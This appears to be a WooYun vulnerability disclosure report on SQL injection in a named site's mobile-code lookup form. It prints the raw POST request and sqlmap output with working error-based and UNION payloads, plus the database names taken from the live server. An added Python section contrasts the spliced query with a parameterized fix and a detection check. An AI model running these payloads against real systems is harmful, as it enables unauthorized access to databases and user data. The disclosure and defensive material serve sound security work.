WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
WooYun Drops articles online: http://drop.zone.ci/
2015-06-23: Details have been sent to the vendor and are awaiting the vendor's handling.
2015-06-28: The vendor has actively ignored the vulnerability; details are disclosed to the public.
POST packet:
POST /LogOn/FindMobileCode HTTP/1.1
Host: www.meetok.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://www.meetok.com/LogOn/DISFindPwd
Content-Length: 47
Cookie: Hm_lvt_7112016fa110c2353d2ce948e7d84fbc=1434877657; Hm_lpvt_7112016fa110c2353d2ce948e7d84fbc=1434877724
X-Forwarded-For: 8.8.8.8'
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

type=DISFindBack&Company=DIS&Mobile=13800138000
The Mobile parameter is not filtered (see the figure below and the vulnerability proof for the exact parameter).
14 databases.
Suspected to be a generic issue. Can't you put up a few websites of successful cases for me to try?
POST parameter 'Mobile' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 48 HTTP(s) requests:
---
Parameter: Mobile (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: type=DISFindBack&Company=DIS&Mobile=13800138000' AND 4170=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(122)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (4170=4170) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(98)+CHAR(113))) AND 'wCUp'='wCUp

    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: type=DISFindBack&Company=DIS&Mobile=13800138000' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(98)+CHAR(122)+CHAR(113)+CHAR(113)+CHAR(83)+CHAR(97)+CHAR(109)+CHAR(97)+CHAR(81)+CHAR(77)+CHAR(121)+CHAR(88)+CHAR(72)+CHAR(78)+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(98)+CHAR(113)--
---
[17:18:50] [INFO] testing Microsoft SQL Server
[17:18:50] [INFO] confirming Microsoft SQL Server
[17:18:50] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[17:18:50] [INFO] fetching database names
[17:18:50] [INFO] the SQL query used returns 15 entries
[17:18:50] [INFO] starting 10 threads
[17:18:50] [INFO] retrieved: HHG
[17:18:51] [INFO] retrieved: KJ_FX_Web
[17:18:51] [INFO] retrieved: master
[17:18:51] [INFO] retrieved: hmb2c
[17:18:51] [INFO] retrieved: JQG
[17:18:51] [INFO] retrieved: meetok_com
[17:18:51] [INFO] retrieved: model
[17:18:51] [INFO] retrieved: ReportServerTempDB
[17:18:51] [INFO] retrieved: msdb
[17:18:51] [INFO] retrieved: ReportServer
[17:18:51] [INFO] retrieved: tempdb
[17:18:51] [INFO] retrieved: TititaTuan_ERP
[17:18:51] [INFO] retrieved: Test
[17:18:51] [INFO] retrieved: TititaTuan_ERP
[17:19:20] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[17:19:22] [INFO] retrieved: NBSX
available databases [14]:
[*] HHG
[*] hmb2c
[*] JQG
[*] KJ_FX_Web
[*] master
[*] meetok_com
[*] model
[*] msdb
[*] NBSX
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] Test
[*] TititaTuan_ERP

[17:19:22] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\www.meetok.com'

[*] shutting down at 17:19:22
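The following is an added example; it is not code from the original report or from the meetok.com application. It shows the defect the report describes (the Mobile value spliced straight into the SQL text, so a single quote closes the string literal) next to the fix a defender would apply: a format check on the parameter plus a bound query parameter, and a small check over request bodies that flags a Mobile field which is not a plain phone number. The report's backend is ASP.NET on Microsoft SQL Server; this example uses Python with sqlite3 as an offline stand-in, and the Users table, its columns, the sample rows and the mobile-number format rule are all assumptions.

```python
import re
import sqlite3
from urllib.parse import parse_qsl

# Constructed sample data standing in for the site's user table; the schema is assumed.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Id INTEGER PRIMARY KEY, Mobile TEXT, Company TEXT)")
    conn.executemany(
        "INSERT INTO Users (Mobile, Company) VALUES (?, ?)",
        [("13800138000", "DIS"), ("13900139000", "DIS"), ("13700137000", "HHG")],
    )
    return conn

def find_mobile_vulnerable(conn, company, mobile):
    """The defect the report describes: request values spliced into the SQL text."""
    sql = (
        "SELECT Id, Mobile FROM Users "
        f"WHERE Company='{company}' AND Mobile='{mobile}'"
    )
    return conn.execute(sql).fetchall()

# Assumed policy: the lookup only makes sense for an 11-digit mainland-China mobile number.
MOBILE_RE = re.compile(r"1[3-9][0-9]{9}")

def validate_mobile(mobile):
    """True only for a value that is exactly a plausible mobile number."""
    return MOBILE_RE.fullmatch(mobile) is not None

def query_parameterized(conn, company, mobile):
    """Bound parameters: the DBMS receives the value as data, never as SQL."""
    sql = "SELECT Id, Mobile FROM Users WHERE Company=? AND Mobile=?"
    return conn.execute(sql, (company, mobile)).fetchall()

def find_mobile_safe(conn, company, mobile):
    """Defence in depth: reject malformed input first, then use bound parameters."""
    if not validate_mobile(mobile):
        return None
    return query_parameterized(conn, company, mobile)

# Constructed request bodies: the first is the report's legitimate form post,
# the second carries a quote in the Mobile field (fragment of the report's probe).
SAMPLE_BODIES = [
    "type=DISFindBack&Company=DIS&Mobile=13800138000",
    "type=DISFindBack&Company=DIS&Mobile=13800138000' AND 'wCUp'='wCUp",
]

def flag_requests(bodies):
    """Detection: return the POST bodies whose Mobile field is not a plain phone number."""
    flagged = []
    for body in bodies:
        params = dict(parse_qsl(body))
        if not validate_mobile(params.get("Mobile", "")):
            flagged.append(body)
    return flagged

if __name__ == "__main__":
    db = build_db()
    probe = "x' OR '1'='1"
    print(find_mobile_vulnerable(db, "DIS", probe))  # every row: the quote closed the literal
    print(query_parameterized(db, "DIS", probe))     # []: the value was bound, not parsed
    print(find_mobile_safe(db, "DIS", probe))        # None: rejected before reaching the DB
    print(flag_requests(SAMPLE_BODIES))              # only the body with the quote
```

The format check alone is not the fix: a value that passes the regex is still bound as a parameter, so the query is safe even if the validation rule is later loosened. The regex is what makes the request-body check useful on its own for reviewing access logs of the FindMobileCode endpoint.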
Any gifts?
Severity: No impact, vendor ignored
Ignored on: 2015-06-28 15:48
Vulnerability Rank: 4 (WooYun rating)
None yet